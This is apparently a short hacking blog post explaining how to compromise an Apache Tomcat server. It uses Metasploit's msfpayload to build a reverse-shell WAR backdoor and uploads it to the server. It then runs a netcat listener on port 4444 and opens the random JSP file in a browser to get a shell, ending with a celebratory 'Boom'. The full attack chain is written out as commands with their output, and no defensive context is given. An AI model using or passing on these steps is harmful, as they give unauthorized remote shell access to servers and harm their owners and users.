Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps:

1. Creating the backdoor.

[email protected]:~$ msfpayload linux/x86/shell_reverse_tcp LHOST= W > dudul.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>""}

it will create a WAR file contain a random name for jsp backdoor file

2. Upload the WAR file.



3. Use netcat to listen for the reverse shell connection.

[email protected]:~$ nc.traditional -lvp 4444
listening on [any] 4444 ...


4. Access the backdoor with the web browser.

Note: msf create a random jsp file, so… make sure to access the right jsp file


5. Boom… we got a reverse shell connection. 😀